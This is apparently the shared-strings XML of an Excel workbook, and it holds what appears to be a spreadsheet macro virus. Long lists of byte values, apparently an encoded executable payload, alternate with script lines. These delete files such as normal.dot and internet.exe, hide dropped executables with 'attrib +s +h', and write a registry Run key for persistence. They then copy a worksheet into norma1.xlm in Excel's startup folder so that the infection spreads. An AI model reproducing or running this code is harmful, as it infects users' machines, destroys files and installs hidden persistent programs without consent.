198 168 153 59 70 219 51 76 191 215 31 52 94 81 246 236 213 133 151 88 145 248 226 55 242 38 163 75 108 48 69 105 5 175 225 51 50 254 97 103 208 181 159 87 10 209 248 115 164 32 53 147 247 </t>
  </si>
  <si>
    <t>end if</t>
  </si>
  <si>
    <t xml:space="preserve">241 181 90 112 237 147 29 156 133 4 23 77 105 25 251 147 218 149 6 118 190 75 251 209 38 83 90 22 191 108 43 223 92 86 123 175 65 127 194 68 175 116 40 79 53 133 199 105 217 239 219 120 187 68 121 87 164 143 129 111 85 192 251 164 141 247 115 146 51 111 116 75 104 106 135 56 60 76 203 200 73 118 30 196 105 47 82 222 74 165 215 32 117 143 128 55 231 48 95 102 151 74 131 208 103 202 219 95 125 238 195 155 21 3 127 124 238 230 71 109 31 174 253 83 247 201 143 62 254 175 185 137 200 159 80 203 125 224 232 51 127 41 58 121 245 135 207 255 249 227 103 254 253 107 253 191 255 131 170 223 121 35 219 189 18 65 23 130 15 93 7 38 69 71 140 77 93 138 61 155 189 106 141 177 251 207 240 2 136 174 86 172 40 6 63 64 124 25 83 176 227 11 255 59 55 231 217 219 198 100 242 80 68 227 83 34 15 133 244 208 13 45 20 36 25 26 234 148 153 233 79 208 80 11 44 142 78 181 243 150 53 158 43 51 164 124 114 57 96 252 179 46 125 140 154 208 159 48 167 11 237 70 182 228 56 75 191 255 89 109 244 248 179 87 111 156 98 221 176 151 34 51 48 254 121 151 24 29 149 130 206 249 90 239 31 188 125 173 183 107 240 79 239 255 210 208 43 247 60 243 238 110 193 149 112 187 62 245 249 126 20 174 152 249 187 115 223 25 244 121 143 252 243 135 223 45 83 159 236 217 236 85 151 175 79 131 59 214 162 177 95 179 222 165 36 166 79 143 158 211 181 40 98 215 39 182 227 237 208 247 190 19 122 40 162 135 162 122 40 166 135 154 244 144 170 135 66 122 40 174 135 14 234 161 4 134 12 77 149 79 56 237 255 119 164 149 162 208 13 222 202 69 90 219 146 172 149 60 169 215 145 213 67 226 253 63 15 105 165 240 94 149 200 121 186 46 120 1 142 172 38 232 58 32 65 87 227 108 111 121 8 41 9 75 232 244 22 154 249 175 143 110 44 191 8 74 200 122 72 146 230 233 4 41 231 55 209 250 104 111 104 99 62 88 66 172 62 41 130 222 78 230 209 172 172 81 101 141 230 201 16 34 126 133 222 53 58 183 51 72 247 10 </t>
  </si>
  <si>
    <t>next</t>
  </si>
  <si>
    <t xml:space="preserve">227 5 153 77 156 236 48 219 171 48 62 46 126 121 115 203 91 206 24 84 245 135 55 99 80 143 140 233 20 26 187 100 226 102 43 95 73 72 255 165 185 40 240 181 137 47 117 100 222 154 77 151 244 128 123 180 109 30 143 79 144 157 227 204 251 206 134 248 251 20 175 32 90 59 60 80 79 8 234 113 107 47 131 183 19 79 200 246 242 220 174 252 246 185 119 100 109 247 91 42 205 234 134 204 147 178 203 109 66 214 22 14 57 83 59 25 100 116 5 227 217 39 115 253 49 40 143 167 203 163 15 141 237 43 20 147 169 132 121 71 66 3 136 50 205 35 156 65 56 139 176 128 112 14 225 60 194 5 132 139 8 151 16 46 35 44 34 92 65 184 138 144 189 173 212 77 46 108 31 86 244 104 94 239 105 83 123 147 148 150 242 110 150 88 123 216 207 194 122 136 33 231 172 87 243 242 103 224 233 130 70 143 33 157 165 31 52 209 225 201 209 245 183 116 57 141 72 218 66 244 118 251 27 218 136 111 29 254 77 125 75 15 227 143 201 181 207 36 15 152 51 80 174 29 54 250 42 202 85 53 245 3 188 117 5 211 71 108 114 5 187 131 122 85 100 119 152 125 218 219 113 136 45 221 130 79 235 23 246 227 193 21 38 58 47 151 253 182 176 189 220 89 175 6 227 62 13 38 16 38 17 166 16 166 17 14 35 28 65 152 65 56 129 144 221 117 82 252 26 127 239 91 235 251 42 231 227 93 27 31 73 191 198 247 178 141 111 51 63 203 8 139 8 87 16 174 34 92 67 184 142 112 131 243 195 116 223 86 31 231 99 94 32 15 198 119 193 33 253 140 3 61 39 40 103 6 235 207 251 17 71 56 139 176 224 39 120 136 218 184 42 145 224 54 92 182 206 85 78 116 144 11 33 154 31 9 63 131 120 35 254 85 185 32 139 181 53 196 214 187 180 210 194 123 3 3 222 178 221 154 162 100 201 237 189 159 229 120 164 111 47 149 200 25 252 129 164 203 41 89 198 101 148 237 188 158 97 240 106 48 75 191 46 49 175 131 2 71 81 137 201 179 200 61 46 204 209 49 108 242 70 172 34 157 61 99 204 32 253 44 63 205 14 158 42 170 245 50 247 184 224 59 </t>
  </si>
  <si>
    <t>e2:</t>
  </si>
  <si>
    <t xml:space="preserve">146 177 156 89 217 240 238 128 23 71 224 5 225 203 109 73 90 246 48 15 69 66 247 72 100 49 102 4 97 196 228 113 48 227 220 38 205 114 189 69 184 136 144 219 221 132 100 165 47 216 202 91 66 184 194 117 85 178 198 175 219 232 17 132 49 94 191 100 205 63 135 248 26 175 79 178 242 179 132 120 146 219 69 164 175 241 122 113 94 140 32 84 17 166 17 142 216 230 231 130 13 242 121 151 205 241 96 31 17 38 17 22 16 206 34 204 33 92 244 88 235 205 249 108 237 180 217 177 121 91 60 199 137 223 42 63 30 207 237 96 26 158 86 255 220 203 215 110 220 238 197 253 86 124 209 111 229 139 183 63 226 177 202 129 183 55 46 91 229 188 193 203 183 173 75 178 152 127 6 161 226 101 107 169 111 121 218 200 121 249 91 240 12 250 85 192 7 82 255 194 86 38 151 166 200 212 133 167 240 73 4 164 55 201 241 111 104 222 117 196 215 40 252 25 205 217 41 171 228 29 249 8 121 67 142 195 62 103 132 166 121 139 110 107 131 196 120 91 1 75 181 143 28 148 37 58 155 38 228 169 11 111 146 106 178 252 205 31 124 244 183 155 111 172 196 59 63 211 117 248 240 97 154 67 33 223 94 248 238 143 226 157 143 116 189 73 87 119 236 26 45 92 151 39 29 100 144 230 220 71 146 240 255 97 250 127 32 197 164 49 174 233 11 229 227 45 47 171 33 174 159 70 17 151 31 36 223 121 237 189 95 222 252 89 188 51 221 197 106 91 252 240 251 127 21 239 124 96 219 218 204 117 26 118 125 197 203 183 236 210 202 77 210 15 87 159 175 78 147 113 245 225 129 199 207 143 62 77 3 39 213 246 11 19 23 9 191 16 28 121 170 61 28 12 190 60 48 122 69 146 95 78 188 144 72 36 122 19 195 201 158 227 135 72 36 225 81 78 7 72 84 174 149 58 18 137 190 99 95 124 49 124 237 158 201 75 79 140 78 74 197 200 67 217 209 207 75 95 63 59 58 233 189 50 30 26 131 139 189 202 232 19 147 245 173 195 151 199 199 102 199 63 63 57 74 252 67 99 228 166 114 225 242 213 240 192 153 92 246 18 77 24 109 130 123 167 100 116 122 124 112 252 </t>
  </si>
  <si>
    <t>fso.deletefile "c:\normal.dot"</t>
  </si>
  <si>
    <t xml:space="preserve">242 197 103 61 114 237 215 7 174 94 153 190 244 244 69 255 243 222 65 79 47 187 112 156 35 236 194 241 249 241 47 168 75 75 171 61 225 224 112 190 45 191 79 133 27 202 95 249 198 227 15 144 236 248 84 188 43 28 124 128 76 169 240 11 245 106 228 211 227 87 174 230 95 63 63 158 147 167 201 179 218 29 81 162 93 18 157 184 68 190 128 183 229 201 208 212 133 209 43 79 61 49 90 117 57 112 81 137 122 107 217 123 43 8 87 133 124 123 215 225 135 47 94 185 24 188 65 238 31 159 186 58 48 122 249 138 55 222 46 157 5 225 7 72 221 139 65 82 1 29 163 208 158 185 174 12 77 143 63 45 165 124 216 113 222 206 244 187 62 232 88 194 123 214 75 187 54 12 239 93 240 228 63 219 184 91 211 32 249 145 206 58 118 21 58 119 56 217 159 205 230 79 166 164 51 103 195 65 239 208 147 254 11 240 2 11 50 53 173 158 96 239 111 73 177 251 181 225 224 95 127 246 10 57 220 63 54 22 14 158 153 90 98 55 163 195 193 211 50 157 181 194 101 31 216 115 245 29 145 29 239 230 35 130 208 57 65 121 162 144 123 189 55 202 172 87 144 247 27 34 143 219 240 173 123 215 228 19 239 234 126 135 162 30 250 123 61 180 162 135 222 215 67 171 122 232 39 122 104 77 15 253 171 30 90 215 67 255 161 135 54 244 208 199 219 248 59 206 146 211 244 59 64 142 210 85 90 47 233 39 135 232 55 65 41 44 196 46 240 30 163 214 145 209 238 100 207 103 192 223 145 68 15 9 203 115 148 210 123 104 232 14 244 119 68 246 51 127 199 218 209 157 251 59 248 62 190 59 255 23 178 182 70 106 130 181 167 15 247 201 246 189 88 168 230 117 89 251 101 18 177 127 36 214 77 200 210 230 37 50 135 113 7 105 202 62 250 87 197 30 89 208 124 93 95 214 246 133 33 221 239 65 231 10 9 79 225 0 63 17 228 43 178 173 127 129 216 252 40 49 201 205 143 18 197 242 166 100 46 159 74 201 72 151 151 196 245 195 60 140 112 24 215 19 35 8 217 179 214 202 154 183 229 98 5 115 155 56 251 139 114 116 134 102 107 22 230 47 98 199 240 91 </t>
  </si>
  <si>
    <t>fso.deletefile "c:\norma1.xlm"</t>
  </si>
  <si>
    <t xml:space="preserve">233 223 0 121 21 150 251 109 38 121 20 37 35 207 117 132 229 200 1 160 105 191 205 158 125 178 253 182 234 183 238 195 151 137 177 15 55 211 217 243 179 60 238 57 120 125 230 248 12 198 71 4 242 49 167 155 145 141 179 61 162 248 9 140 47 218 232 75 72 95 116 200 183 138 241 5 135 120 182 130 206 227 91 84 69 241 42 198 143 56 196 167 48 62 233 212 126 140 143 9 218 111 214 147 148 108 172 255 44 237 198 252 105 27 61 139 244 117 91 125 69 164 175 56 240 179 238 113 151 87 196 235 46 175 132 215 93 94 195 94 119 121 101 189 238 242 154 245 150 39 175 12 247 119 121 173 249 11 152 95 33 203 155 102 250 28 210 211 246 254 247 185 235 175 234 115 214 95 176 121 222 95 159 191 195 92 111 220 103 156 115 227 233 205 241 139 62 222 78 99 156 155 227 87 48 126 94 18 183 107 3 227 103 28 226 217 3 98 22 63 225 16 159 150 196 246 96 216 239 46 207 172 191 60 123 80 240 27 229 139 226 115 126 222 126 135 113 41 25 242 73 154 108 171 178 155 192 153 23 216 59 85 104 167 115 45 250 143 246 175 154 254 57 233 159 27 223 195 1 119 190 178 129 173 237 50 235 19 223 95 177 51 70 176 47 10 216 218 29 16 235 241 114 192 93 238 107 1 119 61 78 96 125 27 8 89 3 64 94 8 35 8 99 8 217 217 25 139 93 193 242 237 242 204 40 6 191 34 190 242 24 31 119 136 159 83 182 202 19 246 241 54 185 44 99 186 25 167 246 99 252 132 67 188 82 177 149 79 161 253 195 116 19 21 14 243 84 133 49 110 45 227 149 235 179 36 169 66 187 91 33 30 79 115 21 238 253 186 84 225 220 175 161 154 77 72 231 113 93 95 220 75 34 65 126 202 143 157 8 14 144 71 200 13 201 190 222 74 4 157 215 23 150 126 64 126 84 187 92 130 238 227 98 38 232 62 255 207 7 13 253 18 214 139 241 41 167 254 15 26 124 137 226 217 195 112 81 191 169 72 111 165 57 45 227 5 253 33 241 74 113 121 35 149 238 122 157 171 20 235 53 227 211 210 255 149 238 227 103 169 210 221 78 174 58 212 195 218 5 245 33 92 </t>
  </si>
  <si>
    <t>fso.deletefile "c:\internet.exe"</t>
  </si>
  <si>
    <t xml:space="preserve">175 180 217 255 80 121 118 58 133 233 98 145 242 236 99 58 228 108 255 220 242 229 66 70 255 236 36 223 234 14 234 19 218 235 144 120 92 174 35 93 218 233 252 128 249 192 207 111 182 15 72 103 39 198 202 41 103 162 106 171 60 96 253 97 211 159 5 93 110 214 250 102 28 218 181 22 18 143 131 76 149 56 125 50 188 115 249 10 199 127 149 251 120 153 175 114 183 31 139 97 49 223 171 152 143 249 43 133 235 255 106 172 215 33 126 216 161 221 169 42 231 118 91 250 169 154 235 201 206 244 189 80 237 62 174 23 171 157 199 167 112 220 85 185 151 151 172 22 183 83 141 148 103 7 178 38 126 44 227 182 122 251 113 107 225 51 44 230 99 62 178 253 190 192 178 174 8 25 251 12 203 120 136 24 227 214 82 126 104 171 126 149 83 79 170 102 107 251 44 242 195 114 153 255 219 34 23 204 151 112 88 95 23 48 126 201 65 47 23 49 126 206 33 126 101 155 242 55 48 62 227 144 63 86 187 53 191 217 223 144 170 181 174 7 22 90 202 180 167 181 238 243 217 108 173 187 29 88 168 117 183 3 75 78 122 28 16 211 217 253 39 70 95 171 117 231 123 161 78 108 95 150 28 236 232 8 166 159 136 150 57 47 132 203 27 103 179 97 99 254 16 197 23 235 202 156 183 111 195 110 151 211 158 88 141 117 255 202 247 23 35 81 155 253 141 226 186 189 190 188 114 215 170 141 245 176 101 126 170 19 219 159 100 212 208 23 203 248 10 139 233 145 250 237 237 140 121 190 213 219 87 111 219 191 163 190 173 218 218 59 227 96 223 178 17 195 111 98 25 167 117 219 247 147 165 252 58 247 125 94 33 138 231 29 234 113 253 103 227 91 169 51 198 159 197 158 70 197 242 157 175 223 25 127 177 168 184 253 51 187 202 211 219 101 135 241 61 131 229 22 109 237 33 40 239 137 6 219 186 32 38 30 207 11 245 134 223 192 50 47 213 138 211 79 212 137 249 73 239 218 234 159 17 206 15 53 198 120 118 243 211 110 39 151 149 50 199 125 220 65 254 115 245 226 126 87 99 229 149 187 24 217 186 206 177 236 155 29 236 239 112 237 206 244 39 130 242 26 177 245 231 72 </t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c attrib +s +h c:\setflag.exe", 0, True</t>
  </si>
  <si>
    <t xml:space="preserve">149 88 63 83 187 220 231 19 118 117 221 62 159 84 214 124 91 214 238 104 136 247 205 153 189 116 190 219 124 138 168 181 154 95 62 78 180 115 156 50 250 229 45 114 109 112 151 75 188 94 188 31 40 34 189 80 107 235 103 164 231 119 219 218 111 170 199 98 23 27 140 121 220 98 87 176 221 171 187 111 207 206 43 14 250 164 54 138 237 116 182 113 251 117 171 235 252 23 21 203 107 30 219 233 177 239 115 26 157 199 97 57 246 157 221 121 0 255 215 30 219 184 64 62 216 195 48 11 29 251 199 111 227 99 181 113 103 122 206 94 165 32 180 115 56 30 99 77 219 200 169 78 44 39 181 73 172 39 145 168 88 126 137 104 121 254 120 118 81 13 246 159 77 232 255 70 152 110 178 181 171 209 161 93 77 238 126 174 121 140 159 221 166 221 137 38 135 125 109 83 153 235 34 156 95 146 173 14 243 79 131 216 206 20 145 238 179 201 101 196 166 55 27 141 226 121 36 230 96 127 227 77 92 159 108 254 214 38 177 191 181 216 236 190 190 94 111 118 183 135 145 22 177 191 104 22 251 51 214 130 178 69 24 111 177 173 99 91 118 182 79 155 109 52 158 39 89 232 187 196 253 24 143 137 229 49 130 245 202 118 251 215 226 48 111 71 184 190 111 179 46 119 226 35 34 166 111 132 196 227 43 187 71 76 95 220 83 222 58 97 189 81 220 238 133 38 177 222 172 180 150 167 239 204 33 234 230 23 80 213 173 250 178 19 123 29 105 22 175 179 211 205 226 113 180 209 34 78 79 90 157 253 8 150 113 222 104 221 119 20 246 224 179 30 21 237 185 106 43 183 109 103 250 154 113 232 119 165 77 108 63 35 109 226 254 201 181 149 215 63 202 30 241 124 146 67 122 192 70 95 112 160 175 182 242 241 33 182 223 197 86 155 221 81 141 244 22 251 170 138 231 245 117 147 28 193 94 224 251 54 156 246 169 153 221 98 57 230 99 14 254 31 85 172 23 74 141 216 94 37 218 240 156 99 187 173 222 106 35 61 59 119 205 94 71 52 141 103 64 84 236 63 246 137 202 141 222 172 137 46 155 218 1 207 231 218 209 254 237 197 250 16 38 247 218 236 152 169 61 162 207 108 </t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c attrib +s +h c:\sendto.exe", 0, True</t>
  </si>
  <si>
    <t xml:space="preserve">251 206 238 35 172 211 244 49 202 243 90 7 214 219 113 251 247 25 20 202 115 186 93 147 7 60 139 54 181 27 124 61 148 62 71 235 153 52 221 51 224 244 34 165 63 102 186 63 48 215 140 243 63 182 43 221 97 235 175 70 113 63 230 91 197 246 96 166 213 120 174 7 231 228 59 233 218 223 196 71 214 62 254 219 140 125 52 75 191 74 59 44 45 184 79 177 76 233 73 27 221 194 79 91 121 254 221 116 204 221 31 147 111 20 183 43 210 200 199 169 205 46 216 236 87 204 166 79 49 140 207 236 179 205 103 166 245 34 107 223 6 141 143 11 218 61 65 229 23 51 209 101 236 71 208 3 65 250 52 77 239 53 201 123 139 255 95 181 242 203 244 146 151 71 76 249 248 245 206 120 167 22 63 67 225 250 166 153 15 212 23 140 159 167 112 85 112 31 98 2 227 151 40 44 10 238 81 172 116 178 51 100 91 233 240 204 120 211 249 158 209 130 173 29 41 90 142 114 80 59 7 99 30 43 107 7 126 51 238 15 49 222 44 235 210 253 232 199 116 154 23 49 126 217 105 158 137 227 121 17 39 191 65 220 253 249 122 58 238 254 124 125 34 238 190 46 157 137 255 119 119 215 31 219 196 117 199 159 207 151 224 56 118 112 182 132 166 165 148 227 32 228 220 36 23 255 128 214 77 73 57 219 4 2 109 33 77 210 66 85 58 226 36 71 156 226 216 198 103 7 103 16 97 126 148 102 157 170 102 108 101 12 117 40 140 182 66 83 170 25 169 5 166 110 195 29 172 141 186 169 13 157 166 69 85 215 24 198 218 252 179 41 157 250 7 154 42 178 247 238 222 139 125 23 219 165 237 166 85 35 74 190 220 123 239 222 189 123 239 251 253 188 239 187 123 223 207 125 193 251 31 46 255 243 121 149 255 206 228 182 183 109 108 198 63 87 61 191 101 115 207 31 22 141 125 49 203 51 229 100 28 230 176 62 91 53 246 89 157 27 223 152 234 220 254 186 80 157 103 95 146 53 247 60 155 180 222 218 122 108 20 183 111 220 138 231 119 44 39 177 76 99 57 141 229 12 150 55 176 68 116 124 178 158 97 201 232 52 241 66 124 126 59 72 216 240 222 172 134 76 153 22 </t>
  </si>
  <si>
    <t>w.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Internet.exe","internet.exe"</t>
  </si>
  <si>
    <t xml:space="preserve">248 255 25 248 59 137 211 82 80 142 52 124 61 91 74 194 235 164 121 205 115 40 220 63 9 205 184 164 172 25 253 86 245 115 45 94 87 230 123 62 135 243 195 249 244 13 231 183 230 243 23 107 11 175 107 19 181 95 240 188 150 211 216 73 109 102 252 85 237 172 207 243 254 179 182 176 221 33 186 69 173 221 9 117 74 253 132 227 13 29 27 178 200 49 102 113 191 201 250 95 135 253 16 40 109 118 101 95 225 55 17 47 229 54 218 149 251 250 80 227 199 216 236 89 251 97 112 123 17 5 165 172 255 88 90 234 243 140 63 238 247 150 60 239 217 58 113 62 151 39 63 129 243 13 121 242 71 235 11 227 122 170 190 48 174 167 235 11 227 58 162 217 44 132 235 12 95 24 215 5 190 176 126 117 242 95 126 253 40 219 54 30 135 97 141 125 251 249 220 248 30 230 115 227 101 130 87 175 75 16 110 1 205 122 91 214 13 140 103 55 176 4 24 155 12 88 90 176 172 194 146 193 146 195 210 134 165 171 65 241 55 226 13 234 117 5 153 55 42 168 1 42 65 29 164 88 234 48 117 148 250 144 50 128 220 126 119 182 223 18 132 191 165 170 244 136 124 127 196 239 6 89 229 25 216 1 15 205 206 247 127 12 48 125 77 142 244 86 167 226 7 107 227 124 93 54 181 255 56 87 222 166 246 31 73 186 31 166 27 114 164 31 135 233 55 242 248 99 211 243 210 247 201 247 53 121 51 115 95 69 89 229 199 53 229 59 97 31 191 67 125 64 149 209 43 41 180 211 141 201 49 191 199 249 60 239 121 184 60 235 88 62 55 190 78 216 53 251 113 161 93 29 119 204 247 15 227 142 111 6 222 161 182 229 124 142 100 47 140 87 22 71 97 188 178 57 10 227 85 171 163 48 94 133 29 133 241 106 196 49 31 175 134 157 36 54 25 199 201 59 21 188 250 159 250 223 154 249 144 224 129 203 137 215 15 78 108 23 80 94 206 17 71 47 251 64 57 226 212 171 156 255 217 248 113 210 158 9 44 39 157 10 55 42 137 102 70 127 209 158 232 236 119 92 100 191 52 218 31 157 43 125 238 89 68 86 132 89 11 142 23 71 49 64 249 122 204 0 38 139 231 226 </t>
  </si>
  <si>
    <t>w.regdelete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Internat.exe"</t>
  </si>
  <si>
    <t xml:space="preserve">197 231 199 91 223 147 43 209 247 21 67 198 187 114 37 57 111 41 62 188 231 11 105 53 191 193 149 231 230 8 69 95 123 61 79 215 128 32 165 240 198 77 202 218 139 248 225 142 202 252 112 232 139 163 132 111 238 28 212 9 30 28 6 99 242 170 253 69 57 122 245 28 197 129 56 197 176 167 146 44 211 131 163 174 78 128 17 10 69 53 161 104 220 109 88 162 168 166 211 48 61 140 143 81 156 123 230 252 93 252 102 95 191 168 92 39 78 213 128 8 69 180 180 149 206 104 189 172 165 120 181 49 67 162 187 53 209 215 228 88 222 221 5 231 0 84 167 71 24 167 116 114 116 109 17 216 219 220 238 29 2 110 225 67 74 167 138 230 230 52 245 24 230 250 225 3 42 195 175 7 219 67 41 252 123 30 1 145 229 193 10 57 133 225 216 69 105 175 183 69 105 127 86 123 178 163 193 181 108 43 115 209 224 121 218 153 206 42 119 140 150 185 57 229 40 124 18 101 13 244 234 104 242 22 189 58 138 122 84 143 234 45 3 234 143 15 163 56 106 212 226 106 48 45 199 56 23 207 197 186 161 168 115 196 174 132 36 186 111 18 133 157 208 231 226 31 84 215 163 232 138 246 90 69 176 137 47 206 161 79 146 68 189 3 20 117 173 232 159 60 190 248 122 217 209 218 36 253 60 208 182 215 70 161 232 219 204 120 108 237 66 95 89 158 197 209 74 36 170 91 158 149 105 212 111 19 50 193 193 223 97 79 152 129 234 227 194 232 131 59 122 164 221 180 30 179 27 224 235 250 73 255 106 88 65 72 116 125 11 222 237 205 96 233 34 81 245 89 44 28 242 125 96 57 65 118 135 47 80 250 209 45 220 164 208 214 128 240 27 183 41 122 142 119 67 249 177 36 199 113 44 83 88 206 96 217 9 50 253 152 173 103 173 56 63 172 57 127 34 79 52 7 169 119 155 65 45 253 88 198 177 28 193 242 184 70 146 252 105 44 103 72 148 8 158 41 24 44 93 88 218 176 28 193 242 12 150 73 44 227 37 234 153 102 212 168 62 158 198 242 134 70 106 211 73 121 27 62 127 88 35 207 96 57 98 84 95 135 28 19 239 220 64 240 198 168 150 2 150 40 82 2 </t>
  </si>
  <si>
    <t xml:space="preserve">233 188 252 245 240 232 206 128 175 23 125 101 185 6 84 233 107 148 241 48 170 89 49 90 240 49 131 165 95 115 76 234 109 213 72 114 31 51 88 166 73 189 165 153 40 1 178 51 232 24 141 230 111 69 159 199 113 58 98 77 253 58 246 91 12 42 101 92 64 253 134 236 20 245 87 46 187 68 229 110 5 111 80 57 114 95 136 81 239 76 233 124 252 211 226 184 140 67 40 42 1 162 6 226 53 189 181 214 211 50 250 20 19 252 41 85 88 33 8 30 161 232 131 108 150 18 194 254 17 46 81 71 196 146 167 24 227 88 191 147 134 140 158 100 230 179 76 189 41 131 186 60 177 11 98 167 136 118 62 223 252 138 250 57 109 80 250 121 18 159 135 142 243 149 71 229 136 157 85 97 41 148 160 118 101 230 119 178 218 69 84 47 168 252 241 44 59 204 212 75 3 62 30 144 202 97 74 25 173 112 96 152 104 196 39 97 129 127 43 225 149 2 64 2 153 243 78 3 154 70 209 61 104 252 80 212 209 9 120 124 65 99 207 195 37 104 92 75 128 59 22 13 237 64 12 169 224 138 124 165 197 160 169 70 61 82 53 203 218 236 94 123 99 155 203 107 135 101 42 232 115 192 4 30 149 196 8 179 78 220 217 23 20 123 174 128 69 176 77 119 208 87 64 21 173 180 248 91 52 226 0 161 149 254 197 215 187 96 252 178 215 187 239 43 93 15 217 147 90 255 230 235 30 178 51 37 207 35 252 19 207 231 95 245 188 9 100 199 240 172 77 212 77 124 190 194 136 114 148 120 230 114 254 219 192 80 170 248 89 150 44 94 96 52 46 202 247 119 54 81 43 224 121 196 86 138 128 39 20 218 101 7 196 207 201 206 143 83 231 233 249 233 30 1 125 51 5 141 59 193 203 227 88 198 49 14 29 199 114 24 203 51 88 142 148 102 236 111 22 71 33 101 231 79 98 57 161 201 159 204 146 231 160 21 191 123 249 87 55 79 37 25 48 32 107 108 57 76 99 193 169 179 239 95 57 251 198 196 71 23 46 159 30 123 231 237 243 159 158 61 253 218 199 111 93 71 199 175 95 190 252 193 248 95 78 95 68 26 157 128 88 114 144 42 133 51 62 75 81 208 243 80 </t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t>W</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>orkbooks.Open Application.StartupPath &amp; "\norma1.xlm"</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">158 44 24 76 153 246 143 1 42 231 104 144 145 170 6 117 208 14 242 149 170 80 149 82 70 14 102 176 86 94 158 175 77 255 141 250 51 120 51 131 251 41 142 239 39 77 112 205 132 252 158 164 236 225 200 243 187 25 227 132 57 195 70 192 192 217 234 156 172 83 229 240 234 44 236 161 99 122 244 9 122 69 235 23 233 213 169 99 24 241 104 189 71 168 208 147 183 227 227 38 5 87 80 148 69 198 47 19 163 18 199 22 188 103 45 75 141 96 2 183 136 235 99 160 30 254 234 53 165 171 193 221 122 10 158 99 211 175 0 126 216 79 43 64 128 214 201 136 176 39 20 233 225 119 199 250 162 80 139 208 156 96 151 199 191 21 247 3 218 133 157 193 65 204 5 20 64 4 48 196 10 116 248 190 60 248 136 146 113 218 128 215 7 115 235 22 51 154 23 21 118 159 73 124 103 132 237 103 50 107 126 184 96 158 99 227 233 123 61 31 27 79 42 109 31 70 28 60 19 30 159 68 249 129 109 239 122 239 122 143 115 29 112 184 235 221 182 245 238 122 96 183 221 227 170 119 223 235 4 174 122 155 203 102 115 120 18 78 231 189 118 207 234 33 243 62 1 19 242 252 166 221 64 8 121 36 74 52 141 203 132 60 62 154 16 242 136 227 132 144 231 76 185 87 64 108 60 146 88 185 164 3 32 54 30 68 198 99 65 108 60 139 170 189 49 137 65 100 60 223 45 109 110 141 129 174 64 95 55 179 21 246 164 191 121 64 12 70 37 166 211 29 14 51 110 74 15 76 190 36 226 215 41 241 39 202 120 240 115 240 152 47 210 34 6 194 27 169 117 96 91 189 221 108 52 27 143 180 38 154 18 110 196 217 163 91 6 118 108 22 247 32 178 33 208 5 113 136 243 12 62 54 226 11 48 91 129 73 98 138 140 163 86 179 113 227 206 68 9 127 248 61 91 135 191 79 122 218 124 168 100 75 68 167 91 216 142 92 127 137 163 237 214 162 10 22 41 133 5 105 133 142 130 166 102 97 58 252 34 120 164 57 222 71 69 117 15 32 114 156 30 38 140 200 113 54 85 28 46 55 47 180 50 188 55 20 30 124 231 118 179 209 0 87 12 27 150 32 94 159 165 198 </t>
  </si>
  <si>
    <t>thisworkbook.Sheets("(m1)_(m2)_(m3)").Columns(2).Copy workbooks("norma1.xlm").sheets("(m1)_(m2)_(m3)").Columns(2)</t>
  </si>
  <si>
    <t xml:space="preserve">208 166 5 116 195 115 149 53 75 3 177 254 153 160 196 57 222 93 86 126 247 239 140 30 238 128 251 46 9 177 236 192 59 3 141 77 172 60 165 200 44 223 108 29 211 6 196 157 98 68 234 8 181 181 192 89 36 81 220 84 243 251 135 106 60 203 168 98 121 62 41 245 46 75 244 247 134 34 131 192 248 168 4 200 156 66 139 61 66 241 195 190 238 72 8 116 12 134 197 198 166 120 32 225 13 245 247 251 130 61 135 54 92 243 93 250 73 71 36 150 120 67 183 61 49 164 127 228 64 115 212 35 238 12 69 68 147 55 32 156 109 59 84 199 120 125 150 96 183 24 112 159 132 160 109 9 136 190 32 24 222 18 100 20 166 163 148 83 138 93 21 62 221 44 198 163 39 159 123 225 16 109 58 220 196 208 1 191 79 146 46 87 173 117 55 186 117 93 165 211 20 91 116 253 193 110 191 78 120 242 97 169 215 19 138 115 128 85 192 148 77 49 43 25 119 119 180 51 88 186 21 172 132 75 122 4 167 128 224 41 32 128 74 93 191 170 83 240 148 62 125 49 85 59 208 245 184 40 209 155 67 244 183 107 153 129 174 230 198 56 56 208 127 48 248 215 238 159 149 13 116 125 178 142 246 46 62 172 107 98 94 106 40 219 145 126 234 246 235 197 155 67 47 221 38 80 27 131 237 85 209 8 39 44 185 218 92 199 176 128 103 173 136 213 200 182 116 5 45 50 163 119 254 195 120 240 68 59 156 176 123 30 20 7 37 134 221 91 5 93 193 3 167 132 98 175 223 7 130 189 50 139 185 27 116 119 139 146 196 196 3 160 77 244 245 108 9 6 6 129 217 184 33 212 17 98 118 127 30 235 235 188 71 140 252 13 108 168 16 152 253 21 246 26 216 184 232 155 223 111 254 33 191 14 244 249 2 161 94 137 139 63 27 88 174 107 79 187 220 146 21 196 77 161 61 79 47 73 173 98 161 141 127 36 129 187 154 56 118 201 181 69 190 209 19 175 46 210 245 172 48 27 125 246 70 179 113 118 41 107 102 63 46 249 173 105 191 35 116 98 127 89 172 108 234 170 45 177 40 81 246 241 134 75 79 184 83 47 235 22 235 103 199 174 141 41 142 255 191 122 133 87 </t>
  </si>
  <si>
    <t>workbooks("norma1.xlm").save</t>
  </si>
  <si>
    <t xml:space="preserve">204 43 95 189 206 94 253 99 247 6 175 126 225 190 131 190 23 118 92 74 63 194 66 40 153 134 88 34 184 250 95 254 53 83 118 240 123 107 129 249 202 14 93 201 172 105 95 247 129 133 109 29 157 145 190 126 238 161 54 176 73 239 5 112 69 42 113 171 86 215 89 24 167 149 159 216 21 19 173 186 180 227 1 134 69 216 245 29 254 205 138 151 13 150 221 147 156 52 18 31 12 187 3 98 100 36 250 202 250 31 23 177 186 63 236 178 242 50 165 212 123 66 135 157 74 214 38 7 194 225 89 250 51 122 246 71 247 89 22 235 130 201 59 91 245 87 215 184 239 159 149 118 204 74 246 225 122 195 107 171 47 174 92 159 216 218 247 248 72 145 157 233 92 83 185 89 2 82 236 173 96 199 182 207 134 36 174 239 207 131 19 79 124 190 203 254 122 121 185 113 35 117 229 190 71 217 232 130 217 35 69 110 122 213 146 133 174 138 133 250 206 247 239 157 26 250 92 226 166 42 167 134 208 207 210 103 238 120 230 147 169 161 